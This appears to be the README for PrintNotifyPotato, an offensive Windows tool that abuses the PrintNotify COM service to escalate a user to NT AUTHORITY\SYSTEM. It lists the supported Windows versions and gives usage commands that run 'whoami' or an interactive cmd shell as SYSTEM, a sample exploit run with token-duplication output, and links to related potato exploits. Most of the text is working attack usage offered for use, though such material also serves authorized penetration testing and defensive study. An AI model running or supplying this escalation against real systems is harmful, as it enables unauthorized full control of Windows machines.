PrintNotifyPotato
Another potato, using the PrintNotify COM service for privilege escalation
For Windows 10 - 11 and Windows Server 2012 - 2022
Usage
C:\Windows\Temp >PrintNotifyPotato.exe
Github: https://github.com/BeichenDream/PrintNotifyPotato
Example:
PrintNotifyPotato.exe whoami
PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe whoami
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >
Reference/Thanks
http://code.google.com/p/google-security-research/issues/detail?id=128
zcgonvh
https://github.com/antonioCoco/JuicyPotatoNG
https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/